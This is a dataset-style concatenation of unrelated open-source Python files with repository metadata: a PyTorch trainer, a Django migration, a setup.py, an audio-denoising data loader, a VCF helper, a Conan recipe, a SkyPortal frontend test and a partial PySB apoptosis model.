                     meta_architecture)
  return decoder_builders[meta_architecture]()
| 40.124294 | 80 | 0.754999 |
2e26529cddd4fc9eea0ccd073ff698ddbb7c9e7f | 5,698 | py | Python | trainer/rascv2_trainer.py | zhou3968322/dl-lab | f6f028df2bd3f68146b3285800938afe71eba442 | [
"MIT"
] | null | null | null | trainer/rascv2_trainer.py | zhou3968322/dl-lab | f6f028df2bd3f68146b3285800938afe71eba442 | [
"MIT"
] | null | null | null | trainer/rascv2_trainer.py | zhou3968322/dl-lab | f6f028df2bd3f68146b3285800938afe71eba442 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# email:bingchengzhou@foxmail.com
# create: 2021/1/12
from utils.common_util import get_model_name
import models, datasets
from utils.log import logger
import time, torchvision
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
class DbwrTrainer(object):
    """Epoch-driven trainer: builds the model and train DataLoader from a config
    dict, logs scalar losses and image grids to TensorBoard, and saves
    checkpoints on an epoch- or step-based schedule.

    NOTE(review): the file is named rascv2_trainer.py but the class is
    DbwrTrainer -- presumably shared across experiments; confirm naming.
    """
    def __init__(self, config):
        # NOTE(review): pop() mutates the caller's config dict in place.
        self.experiment_name = config.pop('name')
        self.random_seed = config.get('random_seed', 30)
        self.start_epoch = config["trainer"]["scheduler"]["start_epoch"]
        self.niter = config["trainer"]["scheduler"]["niter"]
        self.niter_decay = config["trainer"]["scheduler"]["niter_decay"]
        # Resolve the model class by name from the models package.
        model_name = get_model_name(config["arch"].pop("type"))
        self.model = getattr(models, model_name)(config)
        logger.info("model init success")
        tensorboard_log_dir = config["trainer"]["log_dir"]
        self.writer = SummaryWriter(log_dir=tensorboard_log_dir, comment=self.experiment_name)
        self.display_freq = config["trainer"]["display_freq"]
        # self.evaluate_freq = config["trainer"]["evaluate_freq"]
        self.print_freq = config["trainer"]["print_freq"]
        self.evaluate_freq = config["trainer"]["evaluate_freq"]
        # A frequency of 0 disables the corresponding checkpoint schedule
        # (see train_one_epoch).
        self.save_epoch_freq = config["trainer"].get("save_epoch_freq", 0)
        self.save_step_freq = config["trainer"].get("save_step_freq", 0)
        # Build the training dataset/loader from the config.
        dataset_args = config["datasets"]["train"]["dataset"]
        dataset_type = dataset_args["type"]
        dataset_init_args = dataset_args["args"]
        dataset = getattr(datasets, dataset_type)(**dataset_init_args)
        data_loader_args = config["datasets"]["train"]["loader"]
        train_loader = DataLoader(dataset=dataset, **data_loader_args)
        self.train_loader = train_loader
        self.model.set_mode()
        # Global optimization step, shared across epochs.
        self.global_step = 0
    def train(self):
        """Run the full schedule: epochs start_epoch .. niter + niter_decay."""
        for epoch in range(self.start_epoch, self.niter + self.niter_decay + 1):
            self.train_one_epoch(epoch)
        self.writer.close()
    def train_one_epoch(self, epoch):
        """One pass over train_loader with periodic logging, eval and checkpoints."""
        epoch_start_time = time.time()
        for train_data in self.train_loader:
            iter_start_time = time.time()
            self.model.train(train_data)
            self.global_step += 1
            # Periodically log the current training losses as scalars.
            if self.global_step % self.print_freq == 0:
                errors = self.model.get_current_errors()
                t_comp = time.time() - iter_start_time
                message = 'experiment:%s, (epoch: %d, steps: %d, time: %.3f) ' % (self.experiment_name, epoch,
                                                                                  self.global_step, t_comp)
                for key, value in errors.items():
                    message += '%s: %.5f ' % (key, value)
                    self.writer.add_scalar(key, errors[key], self.global_step)
                logger.info(message)
            # if self.global_step % self.evaluate_freq == 0:
            #     evaluate_errors = self.model.get_evaluate_errors()
            #     t_comp = time.time() - iter_start_time
            #     message = 'experiment:%s, (epoch: %d, steps: %d, time: %.3f) ' % (self.experiment_name, epoch,
            #                                                                       self.global_step, t_comp)
            #     for key, value in evaluate_errors.items():
            #         message += '%s: %.5f ' % (key, value)
            #         self.writer.add_scalar(key, evaluate_errors[key], self.global_step)
            #     logger.info(message)
            # Periodically log a grid of training visuals to TensorBoard.
            if self.global_step % self.display_freq == 0:
                visual_input = self.model.get_current_visuals()
                grid = torchvision.utils.make_grid(list(visual_input), nrow=3)
                img_name = self.model.img_name
                self.writer.add_image('experiment_{}_train_epoch_{}_step_{}_img_name_{}'.
                                      format(self.experiment_name, epoch, self.global_step, img_name), grid,
                                      self.global_step)
            # Periodically run inference in eval mode and log input/fake/real.
            if self.global_step % self.evaluate_freq == 0:
                self.model.set_mode(mode="eval")
                fake_b = self.model.inference(train_data["A"])
                b, c, h, w = fake_b.size()
                # Map tensors from [-1, 1] back to [0, 1] for visualization.
                input_image = (train_data["A"].data.cpu()[0, :, :, :] + 1) / 2.0
                fake_b = ((fake_b.data.cpu()[0, :, :, :] + 1) / 2.0).expand(3, h, w)
                real_b = ((train_data["B"].data.cpu()[0, :, :, :] + 1) / 2.0).expand(3, h, w)
                visuals = [input_image, fake_b, real_b]
                grid = torchvision.utils.make_grid(visuals, nrow=3)
                img_name = self.model.img_name
                self.writer.add_image('experiment_{}_eval_epoch_{}_step_{}_img_name_{}'.
                                      format(self.experiment_name, epoch, self.global_step, img_name), grid,
                                      self.global_step + 1)
                # Restore training mode after evaluation.
                self.model.set_mode()
            # Step-based checkpointing, only when epoch-based saving is disabled.
            if self.save_epoch_freq == 0 and self.save_step_freq > 0 and self.global_step % self.save_step_freq == 0:
                logger.info('saving the model epoch:{}, step:{}'.format(epoch, self.global_step))
                self.model.save_networks(epoch)
        # Epoch-based checkpointing.
        if self.save_epoch_freq > 0 and epoch % self.save_epoch_freq == 0:
            logger.info('saving the model at the end of epoch:{}'.format(epoch))
            self.model.save_networks(epoch)
        logger.info('End of epoch {} / {} \t Time Taken: {} sec'.format(epoch, self.niter + self.niter_decay,
                                                                        time.time() - epoch_start_time))
        self.model.update_learning_rate()
| 52.759259 | 117 | 0.571955 |
13fc9c9cacee8e96a311b3cfcfbfef0a9f8c9e6f | 550 | py | Python | backend_rest/tracking/migrations/0010_auto_20200622_2123.py | ezrankayamba/twiga_distribution | ac4fd3d4f6b111e734a932398be564c863582be2 | [
"MIT"
] | null | null | null | backend_rest/tracking/migrations/0010_auto_20200622_2123.py | ezrankayamba/twiga_distribution | ac4fd3d4f6b111e734a932398be564c863582be2 | [
"MIT"
] | 16 | 2020-03-23T13:24:11.000Z | 2022-03-12T00:17:58.000Z | backend_rest/tracking/migrations/0010_auto_20200622_2123.py | ezrankayamba/twiga_distribution | ac4fd3d4f6b111e734a932398be564c863582be2 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-06-22 18:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration (Django 3.0.2, 2020-06-22).
    # Re-declares Customer.category as a cascading ForeignKey to
    # setups.Category with reverse accessor "customers".
    # NOTE: migration files are matched against recorded migration history,
    # so the declarations below must not be edited after being applied.
    # Migrations that must already be applied before this one runs.
    dependencies = [
        ('setups', '0005_auto_20200616_1848'),
        ('tracking', '0009_auto_20200620_1812'),
    ]
    # Schema operations, applied in order.
    operations = [
        migrations.AlterField(
            model_name='customer',
            name='category',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='setups.Category'),
        ),
    ]
| 26.190476 | 129 | 0.649091 |
012fbb7751e89639e178965b4386786f1214e430 | 2,563 | py | Python | setup.py | pytorch-duo/torchmm | 0e44f8599d26a29c345e7cc85e2885813346dc0b | [
"MIT"
] | null | null | null | setup.py | pytorch-duo/torchmm | 0e44f8599d26a29c345e7cc85e2885813346dc0b | [
"MIT"
] | 3 | 2021-06-08T22:22:40.000Z | 2022-03-12T00:47:40.000Z | setup.py | macabdul9/torchmm | 0e44f8599d26a29c345e7cc85e2885813346dc0b | [
"MIT"
] | null | null | null | import codecs
import os
from setuptools import find_packages, setup
# Basic information
NAME = "torchmm"
DESCRIPTION = "PyTorch DataLoader and Abstraction for multi-modal data."
VERSION = "0.0.2 alpha"
AUTHOR = "Abdul Waheed, Ganeshan Malhotra"
EMAIL = "abdulwaheed1513@gmail.com"
LICENSE = "MIT"
REPOSITORY = "https://github.com/pytorch-duo/torchmm"
PACKAGE = "torchmm"
with open("README.md", "r") as f:
LONG_DESCRIPTION = f.read()
# Define the keywords
KEYWORDS = ["machine learning","deep learning", "computer vision", "natural language processing", "pytorch"]
# Define the classifiers
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
]
# Important Paths
PROJECT = os.path.abspath(os.path.dirname(__file__))
REQUIRE_PATH = "requirements.txt"
VERSION_PATH = os.path.join(PACKAGE, "version.py")
PKG_DESCRIBE = "README.md"
# Directories to ignore in find_packages
EXCLUDES = ()
# helper functions
def read(*parts):
    """Return the UTF-8 decoded contents of the file found by joining
    *parts* onto the project root directory."""
    target = os.path.join(PROJECT, *parts)
    with codecs.open(target, "rb", "utf-8") as handle:
        return handle.read()
def get_requires(path=REQUIRE_PATH):
    """Yield requirement specifiers from *path*, skipping blank lines and
    '#' comment lines."""
    for raw in read(path).splitlines():
        spec = raw.strip()
        if spec and not spec.startswith("#"):
            yield spec
# Define the setuptools configuration assembled from the constants above.
CONFIG = {
    "name": NAME,
    "version": VERSION,
    "description": DESCRIPTION,
    "long_description": LONG_DESCRIPTION,
    "long_description_content_type": "text/markdown",
    "classifiers": CLASSIFIERS,
    "keywords": KEYWORDS,
    "license": LICENSE,
    "author": AUTHOR,
    "author_email": EMAIL,
    "url": REPOSITORY,
    "project_urls": {"Source": REPOSITORY},
    "packages": find_packages(where=PROJECT, exclude=EXCLUDES),
    "install_requires": list(get_requires()),
    # Match the classifiers above, which advertise Python 3.6+ only
    # (the previous ">=3.5" contradicted them).
    "python_requires": ">=3.6",
}
if __name__ == "__main__":
    setup(**CONFIG)
| 28.797753 | 108 | 0.678892 |
a4849490214a648184f952591eac6d31b8226e68 | 7,954 | py | Python | scripts/data_loader.py | snehitvaddi/pseudo-visual-speech-denoising | 9247319ef967fa5c40902aeb7c04a117b1387f3a | [
"MIT"
] | 84 | 2020-12-22T10:50:06.000Z | 2022-03-22T06:17:06.000Z | scripts/data_loader.py | snehitvaddi/pseudo-visual-speech-denoising | 9247319ef967fa5c40902aeb7c04a117b1387f3a | [
"MIT"
] | 6 | 2020-12-23T03:49:47.000Z | 2022-03-30T11:41:26.000Z | scripts/data_loader.py | snehitvaddi/pseudo-visual-speech-denoising | 9247319ef967fa5c40902aeb7c04a117b1387f3a | [
"MIT"
] | 17 | 2020-12-23T15:52:01.000Z | 2022-02-07T11:58:02.000Z | from torch.utils.data import Dataset, DataLoader
import torch
import numpy as np
import audio.audio_utils as audio
import audio.hparams as hparams
import random
import os
import librosa
class DataGenerator(Dataset):
    """Dataset that builds (noisy mel chunks, noisy linear spec, clean
    linear spec) training triples by mixing a clean speech file with a
    random noise clip at a randomly chosen SNR of 0, 5 or 10 dB.
    """
    def __init__(self, pretrain_path, train_path, noise_path, sampling_rate, split):
        # Clean speech files for this split plus the pool of noise files.
        self.files = hparams.get_all_files(pretrain_path, train_path, split)
        self.random_files = hparams.get_noise_list(noise_path)
        self.sampling_rate = sampling_rate
    def __len__(self):
        return len(self.files)
    def __getitem__(self, index):
        # NOTE(review): the requested index is ignored — a random file is
        # drawn instead, and the loop retries until a usable example is built
        # (process_audio returns Nones for files that fail to load/crop).
        while(1):
            index = random.randint(0, len(self.files) - 1)
            fname = self.files[index]
            mel, stft, y = self.process_audio(fname)
            if mel is None or stft is None or y is None:
                continue
            # Convert to tensors; the extra dim on the mels acts as a
            # single-channel axis for the downstream model.
            inp_mel = torch.FloatTensor(np.array(mel)).unsqueeze(1)
            inp_stft = torch.FloatTensor(np.array(stft))
            gt_stft = torch.FloatTensor(np.array(y))
            return inp_mel, inp_stft, gt_stft
    def process_audio(self, file):
        """Build one training triple from a clean file: mix in noise,
        crop a 1-second window, and compute the mel/linear features.
        Returns (None, None, None) on any failure so __getitem__ retries."""
        # Load the gt wav file
        try:
            gt_wav = audio.load_wav(file, self.sampling_rate)
        except:
            return None, None, None
        # Get the random file from VGGSound to mix with the ground truth file
        random_file = random.choice(self.random_files)
        # Load the random wav file
        try:
            random_wav = audio.load_wav(random_file, self.sampling_rate)
        except:
            return None, None, None
        # Mix the noisy wav file with the clean GT file at a random SNR.
        # The try also guards against noise clips shorter than the speech.
        try:
            idx = random.randint(0, len(random_wav) - len(gt_wav) - 1)
            random_wav = random_wav[idx:idx + len(gt_wav)]
            snrs = [0, 5, 10]
            target_snr = random.choice(snrs)
            noisy_wav = self.add_noise(gt_wav, random_wav, target_snr)
        except:
            return None, None, None
        # Extract the corresponding audio segments of 1 second
        start_idx, gt_seg_wav, noisy_seg_wav = self.crop_audio_window(gt_wav, noisy_wav, random_wav)
        if start_idx is None or gt_seg_wav is None or noisy_seg_wav is None:
            return None, None, None
        # -----------------------------------STFTs--------------------------------------------- #
        # Get the STFT, normalize and concatenate the mag and phase of GT and noisy wavs
        gt_spec = self.get_spec(gt_seg_wav)                             # Tx514
        noisy_spec = self.get_spec(noisy_seg_wav)                       # Tx514
        # ------------------------------------------------------------------------------------- #
        # -----------------------------------Melspecs------------------------------------------ #
        noisy_mels = self.get_segmented_mels(start_idx, noisy_wav)      # Tx80x16
        if noisy_mels is None:
            return None, None, None
        # ------------------------------------------------------------------------------------- #
        # Input to the lipsync student model: Noisy melspectrogram
        inp_mel = np.array(noisy_mels)                                  # Tx80x16
        # Input to the denoising model: Noisy linear spectrogram
        inp_stft = np.array(noisy_spec)                                 # Tx514
        # GT to the denoising model: Clean linear spectrogram
        gt_stft = np.array(gt_spec)                                     # Tx514
        return inp_mel, inp_stft, gt_stft
    def crop_audio_window(self, gt_wav, noisy_wav, random_wav):
        """Pick a random 1-second window (leaving >=1280 samples of left
        context for the mel history) and apply one random augmentation to
        the noisy segment. Returns (None, None, None) if the file is too
        short or a crop comes out the wrong length."""
        if gt_wav.shape[0] - hparams.hparams.wav_step_size <= 1280:
            return None, None, None
        # Get 1 second random segment from the wav
        start_idx = np.random.randint(low=1280, high=gt_wav.shape[0] - hparams.hparams.wav_step_size)
        end_idx = start_idx + hparams.hparams.wav_step_size
        gt_seg_wav = gt_wav[start_idx : end_idx]
        if len(gt_seg_wav) != hparams.hparams.wav_step_size:
            return None, None, None
        noisy_seg_wav = noisy_wav[start_idx : end_idx]
        if len(noisy_seg_wav) != hparams.hparams.wav_step_size:
            return None, None, None
        # Data augmentation: corrupt a random sub-span (< 3200 samples) of
        # the noisy segment by silencing speech, attenuating it to 10%, or
        # doubling the noise. NOTE(review): this mutates noisy_wav in place
        # too when slicing returns a view — presumably intentional.
        aug_steps = np.random.randint(low=0, high=3200)
        aug_start_idx = np.random.randint(low=0, high=hparams.hparams.wav_step_size - aug_steps)
        aug_end_idx = aug_start_idx+aug_steps
        aug_types = ['zero_speech', 'reduce_speech', 'increase_noise']
        aug = random.choice(aug_types)
        if aug == 'zero_speech':
            noisy_seg_wav[aug_start_idx:aug_end_idx] = 0.0
        elif aug == 'reduce_speech':
            noisy_seg_wav[aug_start_idx:aug_end_idx] = 0.1*gt_seg_wav[aug_start_idx:aug_end_idx]
        elif aug == 'increase_noise':
            random_seg_wav = random_wav[start_idx : end_idx]
            noisy_seg_wav[aug_start_idx:aug_end_idx] = gt_seg_wav[aug_start_idx:aug_end_idx] + (2*random_seg_wav[aug_start_idx:aug_end_idx])
        return start_idx, gt_seg_wav, noisy_seg_wav
    def crop_mels(self, start_idx, noisy_wav):
        """Melspectrogram of one 0.2-second (3200-sample) window, with the
        final frame dropped; None if the window is truncated."""
        end_idx = start_idx + 3200
        # Get the segmented wav (0.2 second)
        noisy_seg_wav = noisy_wav[start_idx : end_idx]
        if len(noisy_seg_wav) != 3200:
            return None
        # Compute the melspectrogram using librosa
        spec = audio.melspectrogram(noisy_seg_wav, hparams.hparams).T   # 16x80
        spec = spec[:-1]
        return spec
    def get_segmented_mels(self, start_idx, noisy_wav):
        """Overlapping 0.2-second mel chunks (hop 640 samples) covering the
        1-second window, each shifted back 1280 samples for left context."""
        mels = []
        if start_idx - 1280 < 0:
            return None
        # Get the overlapping continuous segments of noisy mels
        for i in range(start_idx, start_idx + hparams.hparams.wav_step_size, 640):
            m = self.crop_mels(i - 1280, noisy_wav)                     # Hard-coded to get 0.2sec segments (5 frames)
            if m is None or m.shape[0] != hparams.hparams.mel_step_size:
                return None
            mels.append(m.T)
        mels = np.asarray(mels)                                         # Tx80x16
        return mels
    def get_spec(self, wav):
        """Linear spectrogram: normalized log-magnitude concatenated with
        normalized phase along the frequency axis (Tx514)."""
        # Compute STFT using librosa
        stft = librosa.stft(y=wav, n_fft=hparams.hparams.n_fft_den, \
                            hop_length=hparams.hparams.hop_size_den, win_length=hparams.hparams.win_size_den).T
        stft = stft[:-1]                                                # Tx257
        # Decompose into magnitude and phase representations
        mag = np.abs(stft)
        mag = audio.db_from_amp(mag)
        phase = audio.angle(stft)
        # Normalize the magnitude and phase representations
        norm_mag = audio.normalize_mag(mag)
        norm_phase = audio.normalize_phase(phase)
        # Concatenate the magnitude and phase representations
        spec = np.concatenate((norm_mag, norm_phase), axis=1)           # Tx514
        return spec
    def add_noise(self, gt_wav, random_wav, desired_snr):
        """Scale random_wav so mixing it with gt_wav yields the desired
        SNR (in dB), then return the mixture."""
        samples = len(gt_wav)
        signal_power = np.sum(np.square(np.abs(gt_wav)))/samples
        noise_power = np.sum(np.square(np.abs(random_wav)))/samples
        # Scale factor from SNR(dB) = 10*log10(signal/ (k*noise)); the 1e-8
        # guards against division by zero for silent noise clips.
        k = (signal_power/(noise_power+1e-8)) * (10**(-desired_snr/10))
        scaled_random_wav = np.sqrt(k)*random_wav
        noisy_wav = gt_wav + scaled_random_wav
        return noisy_wav
def load_data(pretrain_path, train_path, noise_path, num_workers, batch_size=4, split='train', sampling_rate=16000, shuffle=False):
    """Construct a torch DataLoader over the noisy/clean audio dataset."""
    generator = DataGenerator(pretrain_path, train_path, noise_path, sampling_rate, split)
    return DataLoader(generator, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)
613a5ac72130c5363e3225ea79d337f2207eb360 | 677 | py | Python | coordinate_output.py | rmclarklab/B49_B75_B96_haplotypes | 1c554d12c005f7c38701d1621a8afff616333595 | [
"MIT"
] | null | null | null | coordinate_output.py | rmclarklab/B49_B75_B96_haplotypes | 1c554d12c005f7c38701d1621a8afff616333595 | [
"MIT"
] | null | null | null | coordinate_output.py | rmclarklab/B49_B75_B96_haplotypes | 1c554d12c005f7c38701d1621a8afff616333595 | [
"MIT"
] | null | null | null |
def coordinates(vcf, outdir):
chrom_file = open(outdir + "/chrom_file.txt", "w")
with open(vcf, "r") as openvcf:
for line in openvcf:
if line.split("=")[0] == "##contig":
vcfcord = line.split("=")
vcf_scaff = vcfcord[2].split(",")[0]
vcf_scaff_len = int(vcfcord[3].split(">")[0])
if vcf_scaff_len > 100000:
chrom_file.write("%s\t%s\n"%(vcf_scaff, str(vcf_scaff_len)))
if line[0] != "#":
break
chrom_file.close()
################################################################################################# | 42.3125 | 97 | 0.40325 |
b76e34e2b99f263928c43a757db2d7170ac0ed49 | 1,458 | py | Python | conanfile.py | helmesjo/conan-fakeit | daf9622052cdc3b92eea40f2cef7151495fc0d7c | [
"MIT"
] | null | null | null | conanfile.py | helmesjo/conan-fakeit | daf9622052cdc3b92eea40f2cef7151495fc0d7c | [
"MIT"
] | null | null | null | conanfile.py | helmesjo/conan-fakeit | daf9622052cdc3b92eea40f2cef7151495fc0d7c | [
"MIT"
] | null | null | null | from conans import ConanFile
import os
class FakeItConan(ConanFile):
    """Conan recipe for FakeIt, a header-only C++ mocking library.

    Packaging only copies headers; the `integration` option picks which
    framework-specific config directory is exposed on the include path.
    """
    name = 'FakeIt'
    version = '2.0.4'
    description = 'C++ mocking made easy. A simple yet very expressive, headers only library for c++ mocking.'
    settings = None
    options = {'integration': ['boost', 'gtest', 'mstest', 'standalone', 'tpunit', 'catch', 'qtest', 'mettle']}
    default_options = 'integration=standalone'
    url = 'https://github.com/gasuketsu/conan-fakeit.git'
    homepage = "https://github.com/eranpeer/FakeIt"
    license = 'MIT'

    def source(self):
        # Clone the upstream repository and pin it to the packaged release.
        upstream = 'https://github.com/eranpeer/FakeIt.git'
        self.run('git clone %s' % ' '.join([upstream, self.name]))
        self.run('cd %s && git checkout %s' % (self.name, self.version))

    def build(self):
        # Header-only library: nothing to compile.
        pass

    def package(self):
        # Ship the public headers, every per-framework config header, and
        # the upstream license file.
        self.copy(pattern='*.hpp', dst='include', src='FakeIt/include')
        self.copy(pattern='*.hpp', dst='config', src='FakeIt/config')
        self.copy('license*', dst='licenses', src='FakeIt', ignore_case=True, keep_path=False)

    def package_id(self):
        # Header-only: a single package id serves every configuration.
        self.info.options.integration = "All"

    def package_info(self):
        # Expose the base headers plus the chosen integration's config dir.
        integration_dir = os.path.join('config', str(self.options.integration))
        self.cpp_info.includedirs = ['include', integration_dir]
| 36.45 | 111 | 0.6262 |
d8ad336bcb0afb2feb8a6f83dbe29e03ab52b9a2 | 1,228 | py | Python | skyportal/tests/frontend/test_top_sources.py | dannygoldstein/skyportal | 3f3518136530fcf5bd1787a4c890782164627fce | [
"BSD-3-Clause"
] | null | null | null | skyportal/tests/frontend/test_top_sources.py | dannygoldstein/skyportal | 3f3518136530fcf5bd1787a4c890782164627fce | [
"BSD-3-Clause"
] | null | null | null | skyportal/tests/frontend/test_top_sources.py | dannygoldstein/skyportal | 3f3518136530fcf5bd1787a4c890782164627fce | [
"BSD-3-Clause"
] | null | null | null | import uuid
from skyportal.tests import api
def test_top_sources(driver, user, public_source, public_group, upload_data_token):
obj_id = str(uuid.uuid4())
status, data = api(
'POST',
'sources',
data={
'id': obj_id,
'ra': 50.4,
'dec': 22.33,
'redshift': 2.1,
"altdata": {"simbad": {"class": "RRLyr"}},
'transient': False,
'ra_dis': 2.3,
'group_ids': [public_group.id],
},
token=upload_data_token,
)
assert status == 200
assert data['data']['id'] == obj_id
driver.get(f'/become_user/{user.id}')
driver.get('/')
driver.wait_for_xpath(f'//a[text()="{obj_id}"]')
# Test that front-end views register as source views
driver.click_xpath(f'//a[text()="{obj_id}"]')
driver.wait_for_xpath(f'//div[text()="{obj_id}"]')
driver.click_xpath('//span[text()="Dashboard"]')
driver.wait_for_xpath(f'//*[contains(.,"1 view(s)")]')
# Test that token requests are registered as source views
status, data = api('GET', f'sources/{obj_id}', token=upload_data_token)
assert status == 200
driver.wait_for_xpath(f'//*[contains(.,"2 view(s)")]')
| 30.7 | 83 | 0.571661 |
35088ab8341d36f89559d3b95d8d743869c548b3 | 13,272 | py | Python | log_mito_act/model_798.py | LoLab-VU/Bayesian_Inference_of_Network_Dynamics | 54a5ef7e868be34289836bbbb024a2963c0c9c86 | [
"MIT"
] | null | null | null | log_mito_act/model_798.py | LoLab-VU/Bayesian_Inference_of_Network_Dynamics | 54a5ef7e868be34289836bbbb024a2963c0c9c86 | [
"MIT"
] | null | null | null | log_mito_act/model_798.py | LoLab-VU/Bayesian_Inference_of_Network_Dynamics | 54a5ef7e868be34289836bbbb024a2963c0c9c86 | [
"MIT"
] | null | null | null | # exported from PySB model 'model'
from pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD
Model()
Monomer('Ligand', ['Receptor'])
Monomer('ParpU', ['C3A'])
Monomer('C8A', ['BidU'])
Monomer('BaxM', ['BidM', 'BaxA'])
Monomer('Apop', ['C3pro', 'Xiap'])
Monomer('Fadd', ['Receptor', 'C8pro'])
Monomer('ParpC')
Monomer('Xiap', ['Apop', 'C3A'])
Monomer('C9')
Monomer('C3ub')
Monomer('C8pro', ['Fadd'])
Monomer('C3pro', ['Apop'])
Monomer('CytoCM', ['BaxA'])
Monomer('CytoCC')
Monomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'CytoCM'])
Monomer('ApafI')
Monomer('BidU', ['C8A'])
Monomer('BidT')
Monomer('C3A', ['Xiap', 'ParpU'])
Monomer('ApafA')
Monomer('BidM', ['BaxM'])
Monomer('Receptor', ['Ligand', 'Fadd'])
# Kinetic rate parameters for the rules below (suffix convention:
# 2kf = bimolecular forward, 1kr = reverse, 1kc = catalytic). All are 1.0
# placeholders — presumably sampled/overridden during Bayesian inference;
# confirm against the calibration scripts.
Parameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)
Parameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)
Parameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)
Parameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)
Parameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)
Parameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)
Parameter('pore_formation_0_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_0_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_1_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_1_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_2_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_2_BaxA_pore_1kr', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)
# Initial species amounts consumed by the Initial() declarations below.
Parameter('Ligand_0', 1000.0)
Parameter('ParpU_0', 1000000.0)
Parameter('C8A_0', 0.0)
Parameter('BaxM_0', 40000.0)
Parameter('Apop_0', 0.0)
Parameter('Fadd_0', 130000.0)
Parameter('ParpC_0', 0.0)
Parameter('Xiap_0', 199500.0)
Parameter('C9_0', 100000.0)
Parameter('C3ub_0', 0.0)
Parameter('C8pro_0', 130000.0)
Parameter('C3pro_0', 21000.0)
Parameter('CytoCM_0', 500000.0)
Parameter('CytoCC_0', 0.0)
Parameter('BaxA_0', 0.0)
Parameter('ApafI_0', 100000.0)
Parameter('BidU_0', 171000.0)
Parameter('BidT_0', 0.0)
Parameter('C3A_0', 0.0)
Parameter('ApafA_0', 0.0)
Parameter('BidM_0', 0.0)
Parameter('Receptor_0', 100.0)
# One observable per monomer, tracking each species' total amount over the
# simulation regardless of binding state.
Observable('Ligand_obs', Ligand())
Observable('ParpU_obs', ParpU())
Observable('C8A_obs', C8A())
Observable('BaxM_obs', BaxM())
Observable('Apop_obs', Apop())
Observable('Fadd_obs', Fadd())
Observable('ParpC_obs', ParpC())
Observable('Xiap_obs', Xiap())
Observable('C9_obs', C9())
Observable('C3ub_obs', C3ub())
Observable('C8pro_obs', C8pro())
Observable('C3pro_obs', C3pro())
Observable('CytoCM_obs', CytoCM())
Observable('CytoCC_obs', CytoCC())
Observable('BaxA_obs', BaxA())
